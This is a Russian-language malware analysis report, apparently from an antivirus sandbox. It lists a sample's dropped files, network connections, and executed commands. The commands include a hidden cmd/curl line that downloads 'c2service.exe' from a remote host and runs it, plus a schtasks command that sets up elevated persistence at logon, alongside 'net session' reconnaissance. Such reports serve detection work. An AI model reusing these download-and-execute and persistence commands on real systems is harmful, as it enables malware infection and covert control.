Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\winsynctask_ts
Изменения в файловой системе
Создает следующие файлы
- %ALLUSERSPROFILE%\testsoftware\media\img_0001.png
- nul
- %ALLUSERSPROFILE%\testsoftware\data\img_0001.png
- %ALLUSERSPROFILE%\testsoftware\data\tservice.exe
- %ALLUSERSPROFILE%\testsoftware\service.exe
Сетевая активность
Подключается к
- '47.##0.83.194':10010
- '47.##0.83.194':10011
TCP
Запросы HTTP GET
- http://47.###.83.194:10011/send/c2service.exe via 47.##0.83.194
Другие
- '47.##0.83.194':10010
Другое
Ищет следующие окна
- ClassName: 'NarratorUIClass' WindowName: ''
Создает и запускает на исполнение
- '%ALLUSERSPROFILE%\testsoftware\data\tservice.exe'
- '%ALLUSERSPROFILE%\testsoftware\service.exe'
Запускает на исполнение
- '<SYSTEM32>\net.exe' session (со скрытым окном)
- '<SYSTEM32>\net1.exe' session
- '<SYSTEM32>\tasklist.exe' /FI "IMAGENAME eq QQPCTray.exe" (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /create /tn WinSyncTask_TS /tr %ALLUSERSPROFILE%\TestSoftware\data\TService.exe /sc onlogon /rl highest /f (со скрытым окном)
- '<SYSTEM32>\svchost.exe' -k appmodel -p -s camsvc
- '%WINDIR%\syswow64\cmd.exe' /C "cd /d %ProgramData%\TestSoftware && curl -s -o service.exe http://47.##0.83.194:10011/send/c2service.exe && start service.exe " (со скрытым окном)
- '%WINDIR%\syswow64\curl.exe' -s -o service.exe http://47.##0.83.194:10011/send/c2service.exe
- '%WINDIR%\syswow64\cmd.exe' (со скрытым окном)
- '%ALLUSERSPROFILE%\testsoftware\data\tservice.exe' (со скрытым окном)
